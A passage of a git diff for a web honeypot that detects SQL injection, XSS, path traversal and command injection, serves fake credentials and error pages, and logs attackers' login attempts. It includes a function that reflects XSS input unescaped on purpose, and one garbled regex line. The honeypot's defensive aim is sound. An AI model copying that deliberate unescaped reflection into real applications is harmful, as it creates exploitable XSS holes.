"username", "created_at"] + error_message = error_message.replace("{column}", secrets.choice(columns)) + + return (error_message, "text/plain") + + +def generate_sql_error_response( + query_string: str, db_type: str = None +) -> Tuple[Optional[str], Optional[str], Optional[int]]: + """Generate SQL error response for detected injection attempts""" + injection_type = detect_sql_injection_pattern(query_string) + + if not injection_type: + return (None, None, None) + + error_message, content_type = get_random_sql_error(db_type, injection_type) + + status_code = 500 + + if _sysrand.random() < 0.3: + status_code = 200 + + logger.info(f"SQL injection detected: {injection_type}") + return (error_message, content_type, status_code) + + +def get_sql_response_with_data(path: str, params: str) -> str: + """Generate fake SQL query response with data""" + injection_type = detect_sql_injection_pattern(params) + + if injection_type in ["union", "boolean", "stacked"]: + data = { + "success": True, + "results": [ + { + "id": i, + "username": random_username(), + "email": random_email(), + "password_hash": random_password(), + "role": secrets.choice(["admin", "user", "moderator"]), + } + for i in range(1, _sysrand.randint(2, 5)) + ], + } + return json.dumps(data, indent=2) + + return json.dumps( + {"success": True, "message": "Query executed successfully", "results": []}, + indent=2, + ) + + +def detect_xss_pattern(input_string: str) -> bool: + """Detect XSS patterns in input""" + if not input_string: + return False + + wl = get_wordlists() + xss_pattern = wl.attack_patterns.get("xss_attempt", "") + + if not xss_pattern: + xss_pattern = r"( str: + """Generate response for XSS attempts with reflected content""" + xss_detected = False + reflected_content = [] + + for key, value in input_data.items(): + if detect_xss_pattern(value): + xss_detected = True + reflected_content.append(f"

{key}: {value}

") + + if xss_detected: + logger.info("XSS attempt detected and reflected") + html = f""" + + + + Submission Received + + + +
+

Thank you for your submission!

+

We have received your information:

+ {''.join(reflected_content)} +

We will get back to you shortly.

+
+ + +""" + return html + + return """ + + + + Submission Received + + + +
+

Thank you for your submission!

+

Your message has been received and we will respond soon.

+
+ + +""" + + +def generate_server_error() -> Tuple[str, str]: + """Generate fake server error page""" + wl = get_wordlists() + server_errors = wl.server_errors + + if not server_errors: + return ("500 Internal Server Error", "text/html") + + server_type = secrets.choice(list(server_errors.keys())) + server_config = server_errors[server_type] + + error_codes = { + 400: "Bad Request", + 401: "Unauthorized", + 403: "Forbidden", + 404: "Not Found", + 500: "Internal Server Error", + 502: "Bad Gateway", + 503: "Service Unavailable", + } + + code = secrets.choice(list(error_codes.keys())) + message = error_codes[code] + + template = server_config.get("template", "") + version = secrets.choice(server_config.get("versions", ["1.0"])) + + html = template.replace("{code}", str(code)) + html = html.replace("{message}", message) + html = html.replace("{version}", version) + + if server_type == "apache": + os = secrets.choice(server_config.get("os", ["Ubuntu"])) + html = html.replace("{os}", os) + html = html.replace("{host}", "localhost") + + logger.debug(f"Generated {server_type} server error: {code}") + return (html, "text/html") + + +def get_server_header(server_type: str = None) -> str: + """Get a fake server header string""" + wl = get_wordlists() + server_errors = wl.server_errors + + if not server_errors: + return "nginx/1.18.0" + + if not server_type: + server_type = secrets.choice(list(server_errors.keys())) + + server_config = server_errors.get(server_type, {}) + version = secrets.choice(server_config.get("versions", ["1.0"])) + + server_headers = { + "nginx": f"nginx/{version}", + "apache": f"Apache/{version}", + "iis": f"Microsoft-IIS/{version}", + "tomcat": f"Apache-Coyote/1.1", + } + + return server_headers.get(server_type, "nginx/1.18.0") + + +def detect_and_respond_deception( + path: str, query: str = "", body: str = "", method: str = "GET" +) -> Optional[Tuple[str, str, int]]: + """ + Main deception detection and response function. 
+ Returns (response_body, content_type, status_code) if deception should be applied, None otherwise. + """ + + logger.debug( + f"Checking deception for {method} {path} query={query[:50] if query else 'empty'}" + ) + + if detect_path_traversal(path, query, body): + logger.info(f"Path traversal detected in: {path}") + return generate_path_traversal_response(f"{path}?{query}" if query else path) + + if body and detect_xxe_injection(body): + logger.info(f"XXE injection detected") + return generate_xxe_response(body) + + if detect_command_injection(path, query, body): + logger.info(f"Command injection detected in: {path}") + full_input = f"{path} {query} {body}" + return generate_command_injection_response(full_input) + + return None diff --git a/src/dependencies.py b/src/dependencies.py new file mode 100644 index 0000000..e1f908f --- /dev/null +++ b/src/dependencies.py @@ -0,0 +1,95 @@ +#!/usr/bin/env python3 + +""" +FastAPI dependency injection providers. +Replaces Handler class variables with proper DI. 
+""" + +import os +from datetime import datetime + +from fastapi import Request +from fastapi.templating import Jinja2Templates + +from config import Config +from tracker import AccessTracker +from database import DatabaseManager, get_database +from logger import get_app_logger, get_access_logger, get_credential_logger + +# Shared Jinja2 templates instance +_templates = None + + +def get_templates() -> Jinja2Templates: + """Get shared Jinja2Templates instance with custom filters.""" + global _templates + if _templates is None: + templates_dir = os.path.join(os.path.dirname(__file__), "templates", "jinja2") + _templates = Jinja2Templates(directory=templates_dir) + _templates.env.filters["format_ts"] = _format_ts + return _templates + + +def _format_ts(value, time_only=False): + """Custom Jinja2 filter for formatting ISO timestamps.""" + if not value: + return "N/A" + if isinstance(value, str): + try: + value = datetime.fromisoformat(value) + except (ValueError, TypeError): + return value + if time_only: + return value.strftime("%H:%M:%S") + if value.date() == datetime.now().date(): + return value.strftime("%H:%M:%S") + return value.strftime("%m/%d/%Y %H:%M:%S") + + +def get_tracker(request: Request) -> AccessTracker: + return request.app.state.tracker + + +def get_app_config(request: Request) -> Config: + return request.app.state.config + + +def get_db() -> DatabaseManager: + return get_database() + + +def get_client_ip(request: Request) -> str: + """Extract client IP address from request, checking proxy headers first.""" + forwarded_for = request.headers.get("X-Forwarded-For") + if forwarded_for: + return forwarded_for.split(",")[0].strip() + + real_ip = request.headers.get("X-Real-IP") + if real_ip: + return real_ip.strip() + + if request.client: + return request.client.host + + return "0.0.0.0" + + +def build_raw_request(request: Request, body: str = "") -> str: + """Build raw HTTP request string for forensic analysis.""" + try: + raw = f"{request.method} 
{request.url.path}" + if request.url.query: + raw += f"?{request.url.query}" + raw += f" HTTP/1.1\r\n" + + for header, value in request.headers.items(): + raw += f"{header}: {value}\r\n" + + raw += "\r\n" + + if body: + raw += body + + return raw + except Exception as e: + return f"{request.method} {request.url.path} (error building full request: {str(e)})" diff --git a/src/firewall/fwtype.py b/src/firewall/fwtype.py new file mode 100644 index 0000000..0e0e421 --- /dev/null +++ b/src/firewall/fwtype.py @@ -0,0 +1,42 @@ +from abc import ABC, abstractmethod +from typing import Dict, Type + + +class FWType(ABC): + """Abstract base class for firewall types.""" + + # Registry to store child classes + _registry: Dict[str, Type["FWType"]] = {} + + def __init_subclass__(cls, **kwargs): + """Automatically register subclasses with their class name.""" + super().__init_subclass__(**kwargs) + cls._registry[cls.__name__.lower()] = cls + + @classmethod + def create(cls, fw_type: str, **kwargs) -> "FWType": + """ + Factory method to create instances of child classes. + + Args: + fw_type: String name of the firewall type class to instantiate + **kwargs: Arguments to pass to the child class constructor + + Returns: + Instance of the requested child class + + Raises: + ValueError: If fw_type is not registered + """ + fw_type = fw_type.lower() + if fw_type not in cls._registry: + available = ", ".join(cls._registry.keys()) + raise ValueError( + f"Unknown firewall type: '{fw_type}'. 
Available: {available}" + ) + + return cls._registry[fw_type](**kwargs) + + @abstractmethod + def getBanlist(self, ips): + """Return the ruleset for the specific server""" diff --git a/src/firewall/iptables.py b/src/firewall/iptables.py new file mode 100644 index 0000000..159171e --- /dev/null +++ b/src/firewall/iptables.py @@ -0,0 +1,40 @@ +from typing_extensions import override +from firewall.fwtype import FWType + + +class Iptables(FWType): + + @override + def getBanlist(self, ips) -> str: + """ + Generate iptables ban rules from an array of IP addresses. + + Args: + ips: List of IP addresses to ban + + Returns: + String containing iptables commands, one per line + """ + if not ips: + return "" + + rules = [] + chain = "INPUT" + target = "DROP" + rules.append("#!/bin/bash") + rules.append("# iptables ban rules") + rules.append("") + + for ip in ips: + + ip = ip.strip() + + # Build the iptables command + rule_parts = ["iptables", "-A", chain, "-s", ip] + + # Add target + rule_parts.extend(["-j", target]) + + rules.append(" ".join(rule_parts)) + + return "\n".join(rules) diff --git a/src/firewall/raw.py b/src/firewall/raw.py new file mode 100644 index 0000000..e0c82fe --- /dev/null +++ b/src/firewall/raw.py @@ -0,0 +1,21 @@ +from typing_extensions import override +from firewall.fwtype import FWType + + +class Raw(FWType): + + @override + def getBanlist(self, ips) -> str: + """ + Generate raw list of bad IP addresses. + + Args: + ips: List of IP addresses to ban + + Returns: + String containing raw ips, one per line + """ + if not ips: + return "" + + return "\n".join(ips) diff --git a/src/geo_utils.py b/src/geo_utils.py index d11f01c..1df9904 100644 --- a/src/geo_utils.py +++ b/src/geo_utils.py @@ -1,113 +1,117 @@ #!/usr/bin/env python3 """ -Geolocation utilities for reverse geocoding and city lookups. +Geolocation utilities for IP lookups using ip-api.com. 
""" import requests -from typing import Optional, Tuple +from typing import Optional, Dict, Any from logger import get_app_logger app_logger = get_app_logger() -# Simple city name cache to avoid repeated API calls -_city_cache = {} - -def reverse_geocode_city(latitude: float, longitude: float) -> Optional[str]: +def fetch_ip_geolocation(ip_address: str) -> Optional[Dict[str, Any]]: """ - Reverse geocode coordinates to get city name using Nominatim (OpenStreetMap). + Fetch geolocation data for an IP address using ip-api.com. + + Results are persisted to the database by the caller (fetch_ip_rep task), + so no in-memory caching is needed. Args: - latitude: Latitude coordinate - longitude: Longitude coordinate + ip_address: IP address to lookup Returns: - City name or None if not found + Dictionary containing geolocation data or None if lookup fails """ - # Check cache first - cache_key = f"{latitude},{longitude}" - if cache_key in _city_cache: - return _city_cache[cache_key] - try: - # Use Nominatim reverse geocoding API (free, no API key required) - url = "https://nominatim.openstreetmap.org/reverse" + url = f"http://ip-api.com/json/{ip_address}" params = { - "lat": latitude, - "lon": longitude, - "format": "json", - "zoom": 10, # City level - "addressdetails": 1, + "fields": "status,message,country,countryCode,region,regionName,city,zip,lat,lon,timezone,isp,org,as,reverse,mobile,proxy,hosting,query" } - headers = {"User-Agent": "Krawl-Honeypot/1.0"} # Required by Nominatim ToS - response = requests.get(url, params=params, headers=headers, timeout=5) + response = requests.get(url, params=params, timeout=5) response.raise_for_status() data = response.json() - address = data.get("address", {}) - # Try to get city from various possible fields - city = ( - address.get("city") - or address.get("town") - or address.get("village") - or address.get("municipality") - or address.get("county") - ) + if data.get("status") != "success": + app_logger.warning( + f"IP lookup failed 
for {ip_address}: {data.get('message')}" + ) + return None - # Cache the result - _city_cache[cache_key] = city - - if city: - app_logger.debug(f"Reverse geocoded {latitude},{longitude} to {city}") - - return city + app_logger.debug(f"Fetched geolocation for {ip_address}") + return data except requests.RequestException as e: - app_logger.warning(f"Reverse geocoding failed for {latitude},{longitude}: {e}") + app_logger.warning(f"Geolocation API call failed for {ip_address}: {e}") return None except Exception as e: - app_logger.error(f"Error in reverse geocoding: {e}") + app_logger.error(f"Error fetching geolocation for {ip_address}: {e}") return None -def get_most_recent_geoip_data(results: list) -> Optional[dict]: +def extract_geolocation_from_ip(ip_address: str) -> Optional[Dict[str, Any]]: """ - Extract the most recent geoip_data from API results. - Results are assumed to be sorted by record_added (most recent first). + Extract geolocation data for an IP address. Args: - results: List of result dictionaries from IP reputation API + ip_address: IP address to lookup Returns: - Most recent geoip_data dict or None + Dictionary with city, country, lat, lon, and other geolocation data or None """ - if not results: + geoloc_data = fetch_ip_geolocation(ip_address) + if not geoloc_data: return None - # The first result is the most recent (sorted by record_added) - most_recent = results[0] - return most_recent.get("geoip_data") + return { + "city": geoloc_data.get("city"), + "country": geoloc_data.get("country"), + "country_code": geoloc_data.get("countryCode"), + "region": geoloc_data.get("region"), + "region_name": geoloc_data.get("regionName"), + "latitude": geoloc_data.get("lat"), + "longitude": geoloc_data.get("lon"), + "timezone": geoloc_data.get("timezone"), + "isp": geoloc_data.get("isp"), + "org": geoloc_data.get("org"), + "reverse": geoloc_data.get("reverse"), + "is_proxy": geoloc_data.get("proxy"), + "is_hosting": geoloc_data.get("hosting"), + } -def 
extract_city_from_coordinates(geoip_data: dict) -> Optional[str]: +def fetch_blocklist_data(ip_address: str) -> Optional[Dict[str, Any]]: """ - Extract city name from geoip_data using reverse geocoding. + Fetch blocklist data for an IP address using lcrawl API. Args: - geoip_data: Dictionary containing location_latitude and location_longitude + ip_address: IP address to lookup Returns: - City name or None + Dictionary containing blocklist information or None if lookup fails """ - if not geoip_data: - return None + # This is now used only for ip reputation + try: + api_url = "https://iprep.lcrawl.com/api/iprep/" + params = {"cidr": ip_address} + headers = {"Content-Type": "application/json"} + response = requests.get(api_url, headers=headers, params=params, timeout=10) - latitude = geoip_data.get("location_latitude") - longitude = geoip_data.get("location_longitude") + if response.status_code == 200: + payload = response.json() + if payload.get("results"): + results = payload["results"] + # Get the most recent result (first in list, sorted by record_added) + most_recent = results[0] + list_on = most_recent.get("list_on", {}) - if latitude is None or longitude is None: - return None + app_logger.debug(f"Fetched blocklist data for {ip_address}") + return list_on + except requests.RequestException as e: + app_logger.warning(f"Failed to fetch blocklist data for {ip_address}: {e}") + except Exception as e: + app_logger.error(f"Error processing blocklist data for {ip_address}: {e}") - return reverse_geocode_city(latitude, longitude) + return None diff --git a/src/handler.py b/src/handler.py deleted file mode 100644 index 0a6abb2..0000000 --- a/src/handler.py +++ /dev/null @@ -1,1052 +0,0 @@ -#!/usr/bin/env python3 - -import logging -import random -import time -from datetime import datetime -from http.server import BaseHTTPRequestHandler -from typing import Optional, List -from urllib.parse import urlparse, parse_qs - -from config import Config -from tracker import 
AccessTracker -from analyzer import Analyzer -from templates import html_templates -from templates.dashboard_template import generate_dashboard -from generators import ( - credentials_txt, - passwords_txt, - users_json, - api_keys_json, - api_response, - directory_listing, - random_server_header, -) -from wordlists import get_wordlists -from sql_errors import generate_sql_error_response, get_sql_response_with_data -from xss_detector import detect_xss_pattern, generate_xss_response -from server_errors import generate_server_error - - -class Handler(BaseHTTPRequestHandler): - """HTTP request handler for the deception server""" - - webpages: Optional[List[str]] = None - config: Config = None - tracker: AccessTracker = None - analyzer: Analyzer = None - counter: int = 0 - app_logger: logging.Logger = None - access_logger: logging.Logger = None - credential_logger: logging.Logger = None - - def _get_client_ip(self) -> str: - """Extract client IP address from request, checking proxy headers first""" - # Headers might not be available during early error logging - if hasattr(self, "headers") and self.headers: - # Check X-Forwarded-For header (set by load balancers/proxies) - forwarded_for = self.headers.get("X-Forwarded-For") - if forwarded_for: - # X-Forwarded-For can contain multiple IPs, get the first (original client) - return forwarded_for.split(",")[0].strip() - - # Check X-Real-IP header (set by nginx and other proxies) - real_ip = self.headers.get("X-Real-IP") - if real_ip: - return real_ip.strip() - - # Fallback to direct connection IP - return self.client_address[0] - - def _get_user_agent(self) -> str: - """Extract user agent from request""" - return self.headers.get("User-Agent", "") - - def _get_category_by_ip(self, client_ip: str) -> str: - """Get the category of an IP from the database""" - return self.tracker.get_category_by_ip(client_ip) - - def _get_page_visit_count(self, client_ip: str) -> int: - """Get current page visit count for an IP""" - return 
self.tracker.get_page_visit_count(client_ip) - - def _increment_page_visit(self, client_ip: str) -> int: - """Increment page visit counter for an IP and return new count""" - return self.tracker.increment_page_visit(client_ip) - - def version_string(self) -> str: - """Return custom server version for deception.""" - return random_server_header() - - def _should_return_error(self) -> bool: - """Check if we should return an error based on probability""" - if self.config.probability_error_codes <= 0: - return False - return random.randint(1, 100) <= self.config.probability_error_codes - - def _get_random_error_code(self) -> int: - """Get a random error code from wordlists""" - wl = get_wordlists() - error_codes = wl.error_codes - if not error_codes: - error_codes = [400, 401, 403, 404, 500, 502, 503] - return random.choice(error_codes) - - def _parse_query_string(self) -> str: - """Extract query string from the request path""" - parsed = urlparse(self.path) - return parsed.query - - def _handle_sql_endpoint(self, path: str) -> bool: - """ - Handle SQL injection honeypot endpoints. - Returns True if the path was handled, False otherwise. 
- """ - # SQL-vulnerable endpoints - sql_endpoints = ["/api/search", "/api/sql", "/api/database"] - - base_path = urlparse(path).path - if base_path not in sql_endpoints: - return False - - try: - # Get query parameters - query_string = self._parse_query_string() - - # Log SQL injection attempt - client_ip = self._get_client_ip() - user_agent = self._get_user_agent() - - # Always check for SQL injection patterns - error_msg, content_type, status_code = generate_sql_error_response( - query_string or "" - ) - - if error_msg: - # SQL injection detected - log and return error - self.access_logger.warning( - f"[SQL INJECTION DETECTED] {client_ip} - {base_path} - Query: {query_string[:100] if query_string else 'empty'}" - ) - self.send_response(status_code) - self.send_header("Content-type", content_type) - self.end_headers() - self.wfile.write(error_msg.encode()) - else: - # No injection detected - return fake data - self.access_logger.info( - f"[SQL ENDPOINT] {client_ip} - {base_path} - Query: {query_string[:100] if query_string else 'empty'}" - ) - self.send_response(200) - self.send_header("Content-type", "application/json") - self.end_headers() - response_data = get_sql_response_with_data( - base_path, query_string or "" - ) - self.wfile.write(response_data.encode()) - - return True - - except BrokenPipeError: - # Client disconnected - return True - except Exception as e: - self.app_logger.error(f"Error handling SQL endpoint {path}: {str(e)}") - # Still send a response even on error - try: - self.send_response(500) - self.send_header("Content-type", "application/json") - self.end_headers() - self.wfile.write(b'{"error": "Internal server error"}') - except: - pass - return True - - def generate_page(self, seed: str, page_visit_count: int) -> str: - """Generate a webpage containing random links or canary token""" - - random.seed(seed) - num_pages = random.randint(*self.config.links_per_page_range) - - # Check if this is a good crawler by IP category from database - 
ip_category = self._get_category_by_ip(self._get_client_ip()) - - # Determine if we should apply crawler page limit based on config and IP category - should_apply_crawler_limit = False - if self.config.infinite_pages_for_malicious: - if ( - ip_category == "good_crawler" or ip_category == "regular_user" - ) and page_visit_count >= self.config.max_pages_limit: - should_apply_crawler_limit = True - else: - if ( - ip_category == "good_crawler" - or ip_category == "bad_crawler" - or ip_category == "attacker" - ) and page_visit_count >= self.config.max_pages_limit: - should_apply_crawler_limit = True - - # If good crawler reached max pages, return a simple page with no links - if should_apply_crawler_limit: - return html_templates.main_page( - Handler.counter, "

Crawl limit reached.

" - ) - - num_pages = random.randint(*self.config.links_per_page_range) - - # Build the content HTML - content = "" - - # Add canary token if needed - if Handler.counter <= 0 and self.config.canary_token_url: - content += f""" - -""" - - # Add links - if self.webpages is None: - for _ in range(num_pages): - address = "".join( - [ - random.choice(self.config.char_space) - for _ in range(random.randint(*self.config.links_length_range)) - ] - ) - content += f""" - -""" - else: - for _ in range(num_pages): - address = random.choice(self.webpages) - content += f""" - -""" - - # Return the complete page using the template - return html_templates.main_page(Handler.counter, content) - - def do_HEAD(self): - """Sends header information""" - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - - def do_POST(self): - """Handle POST requests (mainly login attempts)""" - client_ip = self._get_client_ip() - user_agent = self._get_user_agent() - post_data = "" - - from urllib.parse import urlparse - - base_path = urlparse(self.path).path - - if base_path in ["/api/search", "/api/sql", "/api/database"]: - content_length = int(self.headers.get("Content-Length", 0)) - if content_length > 0: - post_data = self.rfile.read(content_length).decode( - "utf-8", errors="replace" - ) - - self.access_logger.info( - f"[SQL ENDPOINT POST] {client_ip} - {base_path} - Data: {post_data[:100] if post_data else 'empty'}" - ) - - error_msg, content_type, status_code = generate_sql_error_response( - post_data - ) - - try: - if error_msg: - self.access_logger.warning( - f"[SQL INJECTION DETECTED POST] {client_ip} - {base_path}" - ) - self.send_response(status_code) - self.send_header("Content-type", content_type) - self.end_headers() - self.wfile.write(error_msg.encode()) - else: - self.send_response(200) - self.send_header("Content-type", "application/json") - self.end_headers() - response_data = get_sql_response_with_data(base_path, post_data) - 
self.wfile.write(response_data.encode()) - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error in SQL POST handler: {str(e)}") - return - - if base_path == "/api/contact": - content_length = int(self.headers.get("Content-Length", 0)) - if content_length > 0: - post_data = self.rfile.read(content_length).decode( - "utf-8", errors="replace" - ) - - parsed_data = {} - for pair in post_data.split("&"): - if "=" in pair: - key, value = pair.split("=", 1) - from urllib.parse import unquote_plus - - parsed_data[unquote_plus(key)] = unquote_plus(value) - - xss_detected = any(detect_xss_pattern(v) for v in parsed_data.values()) - - if xss_detected: - self.access_logger.warning( - f"[XSS ATTEMPT DETECTED] {client_ip} - {base_path} - Data: {post_data[:200]}" - ) - else: - self.access_logger.info( - f"[XSS ENDPOINT POST] {client_ip} - {base_path}" - ) - - try: - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - response_html = generate_xss_response(parsed_data) - self.wfile.write(response_html.encode()) - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error in XSS POST handler: {str(e)}") - return - - self.access_logger.warning( - f"[LOGIN ATTEMPT] {client_ip} - {self.path} - {user_agent[:50]}" - ) - - content_length = int(self.headers.get("Content-Length", 0)) - if content_length > 0: - post_data = self.rfile.read(content_length).decode( - "utf-8", errors="replace" - ) - - self.access_logger.warning(f"[POST DATA] {post_data[:200]}") - - # Parse and log credentials - username, password = self.tracker.parse_credentials(post_data) - if username or password: - # Log to dedicated credentials.log file - timestamp = datetime.now().strftime("%Y-%m-%dT%H:%M:%SZ") - credential_line = f"{timestamp}|{client_ip}|{username or 'N/A'}|{password or 'N/A'}|{self.path}" - self.credential_logger.info(credential_line) - - # Also record in tracker for dashboard - 
self.tracker.record_credential_attempt( - client_ip, self.path, username or "N/A", password or "N/A" - ) - - self.access_logger.warning( - f"[CREDENTIALS CAPTURED] {client_ip} - Username: {username or 'N/A'} - Path: {self.path}" - ) - - # send the post data (body) to the record_access function so the post data can be used to detect suspicious things. - self.tracker.record_access( - client_ip, self.path, user_agent, post_data, method="POST" - ) - - time.sleep(1) - - try: - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - self.wfile.write(html_templates.login_error().encode()) - except BrokenPipeError: - # Client disconnected before receiving response, ignore silently - pass - except Exception as e: - # Log other exceptions but don't crash - self.app_logger.error(f"Failed to send response to {client_ip}: {str(e)}") - - def serve_special_path(self, path: str) -> bool: - """Serve special paths like robots.txt, API endpoints, etc.""" - - # Check SQL injection honeypot endpoints first - if self._handle_sql_endpoint(path): - return True - - try: - if path == "/robots.txt": - self.send_response(200) - self.send_header("Content-type", "text/plain") - self.end_headers() - self.wfile.write(html_templates.robots_txt().encode()) - return True - - if path in ["/credentials.txt", "/passwords.txt", "/admin_notes.txt"]: - self.send_response(200) - self.send_header("Content-type", "text/plain") - self.end_headers() - if "credentials" in path: - self.wfile.write(credentials_txt().encode()) - else: - self.wfile.write(passwords_txt().encode()) - return True - - if path in ["/users.json", "/api_keys.json", "/config.json"]: - self.send_response(200) - self.send_header("Content-type", "application/json") - self.end_headers() - if "users" in path: - self.wfile.write(users_json().encode()) - elif "api_keys" in path: - self.wfile.write(api_keys_json().encode()) - else: - self.wfile.write(api_response("/api/config").encode()) - return True - - if 
path in ["/admin", "/admin/", "/admin/login", "/login"]: - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - self.wfile.write(html_templates.login_form().encode()) - return True - - if path in ["/users", "/user", "/database", "/db", "/search"]: - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - self.wfile.write(html_templates.product_search().encode()) - return True - - if path in ["/info", "/input", "/contact", "/feedback", "/comment"]: - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - self.wfile.write(html_templates.input_form().encode()) - return True - - if path == "/server": - error_html, content_type = generate_server_error() - self.send_response(500) - self.send_header("Content-type", content_type) - self.end_headers() - self.wfile.write(error_html.encode()) - return True - - if path in ["/wp-login.php", "/wp-login", "/wp-admin", "/wp-admin/"]: - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - self.wfile.write(html_templates.wp_login().encode()) - return True - - if path in ["/wp-content/", "/wp-includes/"] or "wordpress" in path.lower(): - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - self.wfile.write(html_templates.wordpress().encode()) - return True - - if "phpmyadmin" in path.lower() or path in ["/pma/", "/phpMyAdmin/"]: - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - self.wfile.write(html_templates.phpmyadmin().encode()) - return True - - if path.startswith("/api/") or path.startswith("/api") or path in ["/.env"]: - self.send_response(200) - self.send_header("Content-type", "application/json") - self.end_headers() - self.wfile.write(api_response(path).encode()) - return True - - if path in [ - "/backup/", - "/uploads/", - "/private/", - "/admin/", - "/config/", - 
"/database/", - ]: - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - self.wfile.write(directory_listing(path).encode()) - return True - except BrokenPipeError: - # Client disconnected, ignore silently - pass - except Exception as e: - self.app_logger.error(f"Failed to serve special path {path}: {str(e)}") - pass - - return False - - def do_GET(self): - """Responds to webpage requests""" - client_ip = self._get_client_ip() - if self.tracker.is_banned_ip(client_ip): - self.send_response(500) - self.end_headers() - return - user_agent = self._get_user_agent() - - # Handle static files for dashboard - if self.config.dashboard_secret_path and self.path.startswith( - f"{self.config.dashboard_secret_path}/static/" - ): - import os - - file_path = self.path.replace( - f"{self.config.dashboard_secret_path}/static/", "" - ) - static_dir = os.path.join(os.path.dirname(__file__), "templates", "static") - full_path = os.path.join(static_dir, file_path) - - # Security check: ensure the path is within static directory - if os.path.commonpath( - [full_path, static_dir] - ) == static_dir and os.path.exists(full_path): - try: - with open(full_path, "rb") as f: - content = f.read() - self.send_response(200) - if file_path.endswith(".svg"): - self.send_header("Content-type", "image/svg+xml") - elif file_path.endswith(".css"): - self.send_header("Content-type", "text/css") - elif file_path.endswith(".js"): - self.send_header("Content-type", "application/javascript") - else: - self.send_header("Content-type", "application/octet-stream") - self.send_header("Content-Length", str(len(content))) - self.end_headers() - self.wfile.write(content) - return - except Exception as e: - self.app_logger.error(f"Error serving static file: {e}") - - self.send_response(404) - self.send_header("Content-type", "text/plain") - self.end_headers() - self.wfile.write(b"Not found") - return - - if ( - self.config.dashboard_secret_path - and self.path == 
self.config.dashboard_secret_path - ): - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - try: - stats = self.tracker.get_stats() - dashboard_path = self.config.dashboard_secret_path - self.wfile.write(generate_dashboard(stats, dashboard_path).encode()) - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error generating dashboard: {e}") - return - - # API endpoint for fetching all IP statistics - if ( - self.config.dashboard_secret_path - and self.path == f"{self.config.dashboard_secret_path}/api/all-ip-stats" - ): - self.send_response(200) - self.send_header("Content-type", "application/json") - self.send_header("Access-Control-Allow-Origin", "*") - self.send_header( - "Cache-Control", "no-store, no-cache, must-revalidate, max-age=0" - ) - self.send_header("Pragma", "no-cache") - self.send_header("Expires", "0") - self.end_headers() - try: - from database import get_database - import json - - db = get_database() - ip_stats_list = db.get_ip_stats(limit=500) - self.wfile.write(json.dumps({"ips": ip_stats_list}).encode()) - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error fetching all IP stats: {e}") - self.wfile.write(json.dumps({"error": str(e)}).encode()) - return - - # API endpoint for fetching paginated attackers - if self.config.dashboard_secret_path and self.path.startswith( - f"{self.config.dashboard_secret_path}/api/attackers" - ): - self.send_response(200) - self.send_header("Content-type", "application/json") - self.send_header("Access-Control-Allow-Origin", "*") - self.send_header( - "Cache-Control", "no-store, no-cache, must-revalidate, max-age=0" - ) - self.send_header("Pragma", "no-cache") - self.send_header("Expires", "0") - self.end_headers() - try: - from database import get_database - import json - from urllib.parse import urlparse, parse_qs - - db = get_database() - - # Parse query parameters - parsed_url = urlparse(self.path) - 
query_params = parse_qs(parsed_url.query) - page = int(query_params.get("page", ["1"])[0]) - page_size = int(query_params.get("page_size", ["25"])[0]) - sort_by = query_params.get("sort_by", ["total_requests"])[0] - sort_order = query_params.get("sort_order", ["desc"])[0] - - # Ensure valid parameters - page = max(1, page) - page_size = min(max(1, page_size), 100) # Max 100 per page - - result = db.get_attackers_paginated( - page=page, - page_size=page_size, - sort_by=sort_by, - sort_order=sort_order, - ) - self.wfile.write(json.dumps(result).encode()) - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error fetching attackers: {e}") - self.wfile.write(json.dumps({"error": str(e)}).encode()) - return - - # API endpoint for fetching all IPs (all categories) - if self.config.dashboard_secret_path and self.path.startswith( - f"{self.config.dashboard_secret_path}/api/all-ips" - ): - self.send_response(200) - self.send_header("Content-type", "application/json") - self.send_header("Access-Control-Allow-Origin", "*") - self.send_header( - "Cache-Control", "no-store, no-cache, must-revalidate, max-age=0" - ) - self.send_header("Pragma", "no-cache") - self.send_header("Expires", "0") - self.end_headers() - try: - from database import get_database - import json - from urllib.parse import urlparse, parse_qs - - db = get_database() - - # Parse query parameters - parsed_url = urlparse(self.path) - query_params = parse_qs(parsed_url.query) - page = int(query_params.get("page", ["1"])[0]) - page_size = int(query_params.get("page_size", ["25"])[0]) - sort_by = query_params.get("sort_by", ["total_requests"])[0] - sort_order = query_params.get("sort_order", ["desc"])[0] - - # Ensure valid parameters - page = max(1, page) - page_size = min(max(1, page_size), 100) # Max 100 per page - - result = db.get_all_ips_paginated( - page=page, - page_size=page_size, - sort_by=sort_by, - sort_order=sort_order, - ) - self.wfile.write(json.dumps(result).encode()) - 
except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error fetching all IPs: {e}") - self.wfile.write(json.dumps({"error": str(e)}).encode()) - return - - # API endpoint for fetching IP stats - if self.config.dashboard_secret_path and self.path.startswith( - f"{self.config.dashboard_secret_path}/api/ip-stats/" - ): - ip_address = self.path.replace( - f"{self.config.dashboard_secret_path}/api/ip-stats/", "" - ) - self.send_response(200) - self.send_header("Content-type", "application/json") - self.send_header("Access-Control-Allow-Origin", "*") - # Prevent browser caching - force fresh data from database every time - self.send_header( - "Cache-Control", "no-store, no-cache, must-revalidate, max-age=0" - ) - self.send_header("Pragma", "no-cache") - self.send_header("Expires", "0") - self.end_headers() - try: - from database import get_database - import json - - db = get_database() - ip_stats = db.get_ip_stats_by_ip(ip_address) - if ip_stats: - self.wfile.write(json.dumps(ip_stats).encode()) - else: - self.wfile.write(json.dumps({"error": "IP not found"}).encode()) - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error fetching IP stats: {e}") - self.wfile.write(json.dumps({"error": str(e)}).encode()) - return - - # API endpoint for 